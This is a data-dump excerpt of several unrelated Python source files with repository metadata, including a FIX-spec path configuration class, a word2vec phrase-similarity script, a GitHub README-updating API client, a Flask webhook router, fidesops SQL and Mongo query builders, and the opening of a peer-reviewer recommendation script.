/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331
| 218
| 0.539893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,866
| 0.529422
|
3c8d3ed266d844941e1c8f372146b0d80fbb53f5
| 1,491
|
py
|
Python
|
fixation/configuration.py
|
deepy/fix-template
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | null | null | null |
fixation/configuration.py
|
deepy/fix-template
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | 9
|
2018-05-10T19:04:03.000Z
|
2018-06-09T18:10:06.000Z
|
fixation/configuration.py
|
deepy/fixation
|
3f9ce0a74712e9e195c392e0104e7dc8a6a575f5
|
[
"MIT"
] | null | null | null |
from fixation.models import get_id, Message, MsgContent, Component, Field, Enum
import os
class Configuration:
@staticmethod
def fiximate(base_dir):
return Configuration(base_dir)
def __init__(self, base_dir, messages='messages', fields='fields', components='components'):
self.base_dir = base_dir
self.message_dir = messages
self.fields_dir = fields
self.components_dir = components
def get_http_path(self, target):
if isinstance(target, Message):
return "{}/{}".format(self.message_dir, get_id(target))
elif isinstance(target, Field):
return "{}/{}".format(self.fields_dir, get_id(target))
elif isinstance(target, Component):
return "{}/{}".format(self.components_dir, get_id(target))
else:
if target.pretty_type().isdigit():
return "{}/{}".format(self.fields_dir, target.pretty_name())
else:
return "{}/{}".format(getattr(self, target.pretty_type().lower()+"s_dir"), target.pretty_name())
def get_paths(self, target):
if target == 'messages':
return os.path.join(self.base_dir, self.message_dir)
elif target == 'fields':
return os.path.join(self.base_dir, self.fields_dir)
elif target == 'components':
return os.path.join(self.base_dir, self.components_dir)
@staticmethod
def get_filename(target):
return get_id(target)
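# Hypothetical usage sketch (illustrative only, not part of the original file):
#   cfg = Configuration.fiximate('/tmp/fix_spec')
#   cfg.get_paths('messages')        # -> '/tmp/fix_spec/messages'
#   cfg.get_http_path(some_message)  # -> 'messages/<id of some_message>'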
| 35.5
| 112
| 0.627096
| 1,396
| 0.936284
| 0
| 0
| 153
| 0.102616
| 0
| 0
| 102
| 0.06841
|
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a
| 4,201
|
py
|
Python
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 2
|
2021-06-09T20:55:17.000Z
|
2021-11-03T03:07:37.000Z
|
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | null | null | null |
ApproachV4/src/SentenceSimilarity.py
|
kanishk2509/TwitterBotDetection
|
26355410a43c27fff9d58f71ca0d87ff6e707b6a
|
[
"Unlicense"
] | 1
|
2020-07-26T02:31:38.000Z
|
2020-07-26T02:31:38.000Z
|
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model['resume'] -> this returns the NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
class PhraseVector:
def __init__(self, phrase):
self.vector = self.PhraseToVec(phrase)
# <summary> Calculates similarity between two sets of vectors based on the averages of the sets.</summary>
# <param>name = "vectorSet" description = "An array of arrays that needs to be condensed into a single array (vector). In this class, used to convert word vecs to phrases."</param>
# <param>name = "ignore" description = "The vectors within the set that need to be ignored. If this is an empty list, nothing is ignored. In this class, this would be stop words."</param>
    # <returns> The condensed single vector that has the same dimensionality as the other vectors within the vectorSet.</returns>
def ConvertVectorSetToVecAverageBased(self, vectorSet, ignore = []):
if len(ignore) == 0:
return np.mean(vectorSet, axis = 0)
else:
            return np.dot(np.transpose(vectorSet), ignore) / sum(ignore)
def PhraseToVec(self, phrase):
cachedStopWords = stopwords.words("english")
phrase = phrase.lower()
wordsInPhrase = [word for word in phrase.split() if word not in cachedStopWords]
vectorSet = []
for aWord in wordsInPhrase:
try:
                wordVector = model[aWord]
vectorSet.append(wordVector)
except:
pass
return self.ConvertVectorSetToVecAverageBased(vectorSet)
# <summary> Calculates Cosine similarity between two phrase vectors.</summary>
# <param> name = "otherPhraseVec" description = "The other vector relative to which similarity is to be calculated."</param>
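    # Cosine similarity = dot(u, v) / (||u|| * ||v||); the try/except below maps undefined results (NaN, e.g. zero-norm vectors) to 0.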
def CosineSimilarity(self, otherPhraseVec):
cosine_similarity = np.dot(self.vector, otherPhraseVec) / \
(np.linalg.norm(self.vector) * np.linalg.norm(otherPhraseVec))
try:
if math.isnan(cosine_similarity):
cosine_similarity = 0
except:
cosine_similarity = 0
return cosine_similarity
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053
| 191
| 0.615092
| 2,022
| 0.481314
| 0
| 0
| 0
| 0
| 0
| 0
| 2,014
| 0.47941
|
3c8f07d1d3e0d5bb32a801e512cab31d3aca91cc
| 134
|
py
|
Python
|
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | 1
|
2021-09-28T13:11:56.000Z
|
2021-09-28T13:11:56.000Z
|
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | null | null | null |
LISTAS/Valores-unicos-em-uma-Lista-1/main.py
|
lucasf5/Python
|
c5649121e2af42922e2d9c19cec98322e132bdab
|
[
"MIT"
] | null | null | null |
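# Read integers until the sentinel 999; store each distinct value (the sentinel itself is not kept), then print them sorted.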
lista = []
x = 0
while x != 999:
x = int(input('Numero: '))
    if x != 999 and x not in lista:  # do not store the sentinel value
        lista.append(x)
lista.sort()
print(lista)
| 11.166667
| 28
| 0.559701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.074627
|
3c8f9f7ee5923a773fc310335335a5650e8aeefb
| 12,399
|
py
|
Python
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 8
|
2021-09-22T21:06:13.000Z
|
2022-03-27T09:52:55.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 6
|
2021-07-30T09:35:01.000Z
|
2022-03-30T13:16:03.000Z
|
src/api.py
|
CodexLink/ProfileMD_DRP
|
7604c0d43817daf3590306fd449352673db272fe
|
[
"Apache-2.0"
] | 2
|
2021-08-14T10:45:37.000Z
|
2021-11-20T12:41:13.000Z
|
"""
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
class AsyncGithubAPILite:
# * The following variables are declared for weak reference since there's no hint-typing inheritance.
envs: Any
logger: Logger
print_exception: Callable
"""
This child class is a scratch implementation based from Github API. It was supposed to be a re-write implementation of PyGithub for async,
but I just realized that I only need some certain components. This class also contains session for all HTTPS requests and that includes Badgen.
"""
async def __ainit__(self) -> None:
"""
Asynchronous init for instantiating other classes, if there's another one behind the MRO, which is the DiscordClientHandler.
This also instantiates aiohttp.ClientSession for future requests.
"""
self._api_session: ClientSession = ClientSession()
self.logger.info("ClientSession for API Requests has been instantiated.")
super().__init__()
self.logger.info(
f"Discord Client Instantiatied with intents={DISCORD_CLIENT_INTENTS=}"
)
self.logger.info(
f"{AsyncGithubAPILite.__name__} is done initializing other elements."
)
async def exec_api_actions(
self,
action: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> Union[None, list[Union[READMEIntegritySHA, Base64String]]]:
"""
A method that handles every possible requests by packaging required components into one. This was done so that we only have to call the method without worrying anything.
Args:
action (GithubRunnerActions): The action to perform. Choices should be FETCH_README and COMMIT_CHANGES.
data (Optional[list[tuple[READMEIntegritySHA, READMERawContent]]] , optional): The data required for COMMIT_CHANGES.
Basically it needs the old README SHA integrity and the new README in the form of Base64 (READMERawContent). Defaults to None.
Returns:
Union[None, list[Union[READMEIntegritySHA, Base64String]]]: This expects to return a list of READMEIntegritySHA and Base64 straight from b64decode or None.
"""
if action in GithubRunnerActions:
# We setup paths for HttpsURL with the use of these two varaibles.
user_repo = (
"{0}/{0}".format(self.envs["GITHUB_ACTOR"])
if self.envs["PROFILE_REPOSITORY"] is None
else "{0}".format(self.envs["PROFILE_REPOSITORY"])
)
repo_path: HttpsURL = HttpsURL(
"{0}/repos/{1}/{2}".format(
self.envs["GITHUB_API_URL"],
user_repo,
"readme"
if action is GithubRunnerActions.FETCH_README
else "contents/README.md",
)
)
# When making requests, we might want to loop whenever the data that we receive is malformed or have failed to send.
while True:
http_request: ClientResponse = await self._request(
repo_path, action, data=data if data is not None else None
)
try:
if http_request.ok:
suffix_req_cost: str = (
"Remaining Requests over Rate-Limit (%s/%s)"
% (
http_request.headers["X-RateLimit-Remaining"],
http_request.headers["X-RateLimit-Limit"],
)
)
# For this action, decode the README (base64) in utf-8 (str) then sterilized unnecessary newline.
if action is GithubRunnerActions.FETCH_README:
read_response: bytes = http_request.content.read_nowait()
serialized_response: dict = literal_eval(
read_response.decode("utf-8")
)
self.logger.info(
f"Github Profile ({user_repo}) README has been fetched. | {suffix_req_cost}"
)
return [
serialized_response["sha"],
Base64String(
serialized_response["content"].replace("\n", "")
),
]
# Since we commit and there's nothing else to modify, just output that the request was success.
if action is GithubRunnerActions.COMMIT_CHANGES and data is Base64String(data): # type: ignore # It explicitly wants to typecast `str`, which renders the condition false.
self.logger.info(
f"README Changes from ({user_repo}) has been pushed through! | {suffix_req_cost}"
)
return None
# If any of those conditions weren't met, retry again.
else:
                            self.logger.warning(
                                "Conditions were not met, retrying after a short delay (as a penalty)."
                            )
await sleep(0.6)
continue
# Same for this case, but we assert that the data received is malformed.
except SyntaxError as e:
self.logger.warning(
f"Fetched Data is either incomplete or malformed. Attempting to re-fetch... | Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
)
await sleep(0.6)
continue
# Whenever we tried too much, we don't know if we are rate-limited, because the request will make the ClientResponse.ok set to True.
# So for this case, we special handle it by identifying the message.
except KeyError as e:
if serialized_response["message"].startswith(
"API rate limit exceeded"
):
msg: str = f"Request accepted but you are probably rate-limited by Github API. Did you keep on retrying or you are over-committing changes? | More Info: {e} at line {e.__traceback__.tb_lineno}." # type: ignore
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, e)
terminate(ExitReturnCodes.RATE_LIMITED_EXIT)
else:
msg = f"The given value on `action` parameter is invalid! Ensure that the `action` is `{GithubRunnerActions}`!"
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
async def _request(
self,
url: HttpsURL,
action_type: GithubRunnerActions,
data: Optional[list[Union[READMEIntegritySHA, READMERawContent]]] = None,
) -> ClientResponse:
"""
An inner-private method that handles the requests by using packaged header and payload, necessarily for requests.
Args:
url (HttpsURL): The URL String to make Request.
action_type (GithubRunnerActions): The type of action that is recently passed on `exec_api_actions().`
data (Optional[list[Union[READMEIntegritySHA, READMERawContent]]], optional): The argument given in `exec_api_actions()`, now handled in this method.. Defaults to None.
Returns:
ClientResponse: The raw response given by the aiohttp.REST_METHODS. Returned without modification to give the receiver more options.
"""
if action_type in GithubRunnerActions:
self.logger.info(
(
"Attempting to Fetch README from Github API <<< {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
if action_type is GithubRunnerActions.FETCH_README
else "Attempting to Commit Changes of README from Github API >>> {0}/{0} ({1})".format(
self.envs["GITHUB_ACTOR"], url
)
)
if GithubRunnerActions.COMMIT_CHANGES
else None
)
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
extra_contents: REQUEST_HEADER = {
"headers": {"Accept": "application/vnd.github.v3+json"},
"auth": BasicAuth(
self.envs["GITHUB_ACTOR"], self.envs["WORKFLOW_TOKEN"]
),
}
# # This dictionary is applied when GithubRunnerActions.COMMIT_CHANGES was given in parameter `action`.
data_context: COMMIT_REQUEST_PAYLOAD = (
{
"content": READMEContent(bytes(data[1]).decode("utf-8")) if data is not None else None, # type: ignore # Keep in mind that the type-hint is already correct, I don't know what's the problem.]
"message": self.envs["COMMIT_MESSAGE"],
"sha": READMEIntegritySHA(str(data[0]))
if data is not None
else None,
"committer": {
"name": "Discord Activity Badge",
"email": "discord_activity@discord_bot.com",
},
}
if action_type is GithubRunnerActions.COMMIT_CHANGES
else {
"content": READMEContent(""),
"message": "",
"sha": READMEIntegritySHA(""),
"committer": {"name": "", "email": ""},
}
)
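            # Dispatch on the HTTP verb: GET for fetching the README, PUT for pushing the commit payload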
http_request: ClientResponse = await getattr(
self._api_session,
"get" if action_type is GithubRunnerActions.FETCH_README else "put",
)(url, json=data_context, allow_redirects=False, **extra_contents)
# todo: Make this clarified or confirmed. We don't have a case to where we can see this in action.
if http_request.ok:
return http_request
# ! Sometimes, we can exceed the rate-limit request per time. We have to handle the display error instead from the receiver of this request.
_resp_raw: ClientResponse = http_request # Supposed to be ClientResponse
_resp_ctx: dict = literal_eval(str(_resp_raw))
self.logger.debug(_resp_ctx)
terminate(ExitReturnCodes.EXCEPTION_EXIT)
else:
msg: str = f"An Enum invoked on `action` parameter ({action_type.name}) is invalid! This is probably an issue from the developer, please contact the developer as possible."
self.logger.critical(msg)
self.print_exception(GithubRunnerLevelMessages.ERROR, msg, None)
terminate(ExitReturnCodes.ILLEGAL_CONDITION_EXIT)
| 46.092937
| 234
| 0.583595
| 11,279
| 0.90967
| 0
| 0
| 0
| 0
| 10,758
| 0.867651
| 5,760
| 0.464554
|
3c9056dfb6354e5daafd7bffd768de97d7f13f54
| 11,790
|
py
|
Python
|
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
src/fidesops/service/connectors/query_config.py
|
nathanawmk/fidesops
|
1ab840206a78e60673aebd5838ba567095512a58
|
[
"Apache-2.0"
] | null | null | null |
import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
class QueryConfig(Generic[T], ABC):
"""A wrapper around a resource-type dependant query object that can generate runnable queries and string representations."""
class QueryToken:
"""A placeholder token for query output"""
def __str__(self) -> str:
return "?"
def __repr__(self) -> str:
return "?"
def __init__(self, node: TraversalNode):
self.node = node
@property
    def fields(self) -> List[str]:
        """Fields of interest from this traversal_node."""
return [f.name for f in self.node.node.collection.fields]
def update_fields(self, policy: Policy) -> List[str]:
"""List of update-able field names"""
def exists_child(
field_categories: List[str], policy_categories: List[str]
) -> bool:
"""A not very efficient check for any policy category that matches one of the field categories or a prefix of it."""
if field_categories is None or len(field_categories) == 0:
return False
for policy_category in policy_categories:
for field_category in field_categories:
if field_category.startswith(policy_category):
return True
return False
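        # e.g. (illustrative values) a field tagged "user.provided.identifiable.contact.email"
        # matches a policy category "user.provided.identifiable" via the prefix check above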
policy_categories = policy.get_erasure_target_categories()
return [
f.name
for f in self.node.node.collection.fields
if exists_child(f.data_categories, policy_categories)
]
@property
def primary_keys(self) -> List[str]:
"""List of fields marked as primary keys"""
return [f.name for f in self.node.node.collection.fields if f.primary_key]
@property
def query_keys(self) -> Set[str]:
"""
All of the possible keys that we can query for possible filter values.
These are keys that are the ends of incoming edges.
"""
return set(map(lambda edge: edge.f2.field, self.node.incoming_edges()))
def filter_values(self, input_data: Dict[str, List[Any]]) -> Dict[str, Any]:
"""
Return a filtered list of key/value sets of data items that are both in
the list of incoming edge fields, and contain data in the input data set
"""
return {
key: value
for (key, value) in input_data.items()
if key in self.query_keys
and isinstance(value, list)
and len(value)
and None not in value
}
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
        values are assumed to be present and singular, and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
@abstractmethod
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy]
) -> Optional[T]:
"""Generate a retrieval query. If there is no data to be queried
(for example, if the policy identifies no fields to be queried)
returns None"""
@abstractmethod
def query_to_str(self, t: T, input_data: Dict[str, List[Any]]) -> str:
"""Convert query to string"""
@abstractmethod
def dry_run_query(self) -> Optional[str]:
"""dry run query for display"""
@abstractmethod
def generate_update_stmt(self, row: Row, policy: Optional[Policy]) -> Optional[T]:
"""Generate an update statement. If there is no data to be updated
(for example, if the policy identifies no fields to be updated)
returns None"""
class SQLQueryConfig(QueryConfig[TextClause]):
"""Query config that translates parameters into SQL statements."""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a retrieval query"""
filtered_data = self.filter_values(input_data)
if filtered_data:
clauses = []
query_data: Dict[str, Tuple[Any, ...]] = {}
field_list = ",".join(self.fields)
for field_name, data in filtered_data.items():
if len(data) == 1:
clauses.append(f"{field_name} = :{field_name}")
query_data[field_name] = (data[0],)
elif len(data) > 1:
clauses.append(f"{field_name} IN :{field_name}")
query_data[field_name] = tuple(set(data))
else:
# if there's no data, create no clause
pass
if len(clauses) > 0:
query_str = f"SELECT {field_list} FROM {self.node.node.collection.name} WHERE {' OR '.join(clauses)}"
return text(query_str).params(query_data)
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[TextClause]:
"""Generate a SQL update statement in the form of a TextClause"""
update_fields = self.update_fields(policy)
update_value_map = {k: None for k in update_fields}
update_clauses = [f"{k} = :{k}" for k in update_fields]
pk_clauses = [f"{k} = :{k}" for k in self.primary_keys]
for pk in self.primary_keys:
update_value_map[pk] = row[pk]
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update statement for {self.node.address}"
)
return None
query_str = f"UPDATE {self.node.address.collection} SET {','.join(update_clauses)} WHERE {','.join(pk_clauses)}"
logger.info("query = %s, params = %s", query_str, update_value_map)
return text(query_str).params(update_value_map)
def query_to_str(self, t: TextClause, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
def transform_param(p: Any) -> str:
if isinstance(p, str):
return f"'{p}'"
return str(p)
query_str = str(t)
for k, v in input_data.items():
if len(v) == 1:
query_str = re.sub(f"= :{k}", f"= {transform_param(v[0])}", query_str)
elif len(v) > 0:
query_str = re.sub(f"IN :{k}", f"IN { tuple(set(v)) }", query_str)
return query_str
def dry_run_query(self) -> Optional[str]:
query_data = self.display_query_data()
text_clause = self.generate_query(query_data, None)
if text_clause is not None:
return self.query_to_str(text_clause, query_data)
return None
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1, k2:v2, ...}, {$set: {f1:fv1, f2:fv2, ...}}, upsert=False).
This is returned as the tuple
({k1:v1, k2:v2, ...}, {$set: {f1:fv1, f2:fv2, ...}})
"""
class MongoQueryConfig(QueryConfig[MongoStatement]):
    """Query config that translates parameters into Mongo statements"""
def generate_query(
self, input_data: Dict[str, List[Any]], policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
def transform_query_pairs(pairs: Dict[str, Any]) -> Dict[str, Any]:
"""Since we want to do an 'OR' match in mongo, transform queries of the form
{A:1, B:2} => "{$or:[{A:1},{B:2}]}".
Don't bother to do this if the pairs size is 1
"""
if len(pairs) < 2:
return pairs
return {"$or": [dict([(k, v)]) for k, v in pairs.items()]}
if input_data:
filtered_data = self.filter_values(input_data)
if filtered_data:
field_list = {field_name: 1 for field_name in self.fields}
query_pairs = {}
for field_name, data in filtered_data.items():
if len(data) == 1:
query_pairs[field_name] = data[0]
elif len(data) > 1:
query_pairs[field_name] = {"$in": data}
else:
# if there's no data, create no clause
pass
query_fields, return_fields = (
transform_query_pairs(query_pairs),
field_list,
)
return query_fields, return_fields
logger.warning(
f"There is not enough data to generate a valid query for {self.node.address}"
)
return None
def generate_update_stmt(
self, row: Row, policy: Optional[Policy] = None
) -> Optional[MongoStatement]:
"""Generate a SQL update statement in the form of Mongo update statement components"""
update_fields = self.update_fields(policy)
update_clauses = {k: None for k in update_fields}
pk_clauses = {k: row[k] for k in self.primary_keys}
valid = len(pk_clauses) > 0 and len(update_clauses) > 0
if not valid:
logger.warning(
f"There is not enough data to generate a valid update for {self.node.address}"
)
return None
return pk_clauses, {"$set": update_clauses}
def query_to_str(self, t: MongoStatement, input_data: Dict[str, List[Any]]) -> str:
"""string representation of a query for logging/dry-run"""
query_data, field_list = t
db_name = self.node.address.dataset
collection_name = self.node.address.collection
return f"db.{db_name}.{collection_name}.find({query_data}, {field_list})"
def dry_run_query(self) -> Optional[str]:
data = self.display_query_data()
        mongo_query = self.generate_query(data, None)  # reuse the same display data for a faithful string
if mongo_query is not None:
return self.query_to_str(mongo_query, data)
return None
| 38.655738
| 128
| 0.598473
| 10,694
| 0.90704
| 0
| 0
| 1,459
| 0.123749
| 0
| 0
| 3,552
| 0.301272
|
3c90a121b4d915c2524981fd84ae09376497b28d
| 91
|
py
|
Python
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/simple_str.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1
| 24
| 0.56044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 61
| 0.67033
|
3c92d76b2ecb583dc3d4b1217c00aa46b1e963fb
| 710
|
py
|
Python
|
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | null | null | null |
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | 4
|
2018-02-21T11:25:49.000Z
|
2018-06-23T15:51:51.000Z
|
src/catchbot/routes.py
|
grihabor/catch-hook-telegram-bot
|
1f3c6a5d56d5ebba3d4620b532acde2ed734a75e
|
[
"MIT"
] | null | null | null |
from flask import request, redirect
from .message import create_message_for_user
from .tasks import send_message_to_bot
def _hook(chat_id, hash):
if not request.is_json:
return 'Data must be in json format', 400
json_obj = request.get_json(cache=False)
msg = create_message_for_user(request.headers, json_obj)
send_message_to_bot.delay(chat_id, msg)
return 'OK', 200
def _root():
return redirect('http://t.me/catch_web_hook_bot', code=302)
def register_routes(app):
@app.route('/hooks/<chat_id>/<hash>', methods=['POST'])
def hook(chat_id, hash):
return _hook(chat_id, hash)
@app.route('/', methods=['GET'])
def root():
return _root()
| 22.903226
| 63
| 0.683099
| 0
| 0
| 0
| 0
| 191
| 0.269014
| 0
| 0
| 104
| 0.146479
|
3c97c75c9954f8ab840e506c7e164088d7c58e96
| 17,208
|
py
|
Python
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | 2
|
2020-05-25T08:20:54.000Z
|
2020-05-25T08:21:02.000Z
|
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
src/PR_recommend_algorithm.py
|
HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation
|
6e94a7775f110bd74a71182f0d29baa91f880ac9
|
[
"Apache-2.0"
] | null | null | null |
#-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
# Preprocessing function definition
def remove_string_special_characters(s):
    stripped = re.sub(r'[^a-zA-Z\s]', '', s)  # keep only ASCII letters and whitespace (fixes the 'a-zA-z' range typo)
    stripped = re.sub('_', '', stripped)
    stripped = re.sub(r'\s+', ' ', stripped)
stripped = stripped.strip()
if stripped != '':
return stripped.lower()
# Class-object (multi-key) sorting function definition
def multisort(xs, specs):
for key, reverse in reversed(specs):
xs.sort(key=attrgetter(key), reverse=reverse)
return xs
# Attribute-set extraction function definition
# Keyword arguments (input csv path, output csv path including the attribute set, number of words to extract)
def extractive_keyword(path,database_update_path,extract_word_num=20):
reviewee = pd.read_csv(path, encoding='latin1')
count,temp = len(reviewee),[]
for i in range(count):
temp_intro = reviewee['submitter_intro'][i]
temp_sent = summarize(reviewee['submitter_intro'][i], ratio=0.05)
textrank_textsent_mearge = ''
textrank_text,textrank_sent = '',''
for c in (keywords(temp_intro, words=extract_word_num-(extract_word_num//4), lemmatize=True).split('\n')):
textrank_text += (c+ " ")
for cc in (keywords(temp_sent, words=(extract_word_num//4), lemmatize=True).split('\n')):
textrank_sent += (cc+ " ")
temp.append(textrank_text + " " + textrank_sent)
reviewee['submitter_attribute']=temp
reviewee.iloc[:,1:].to_csv(database_update_path)
#return type : pandas.dataframe
return reviewee
# Expertise (professionalism) check function definition
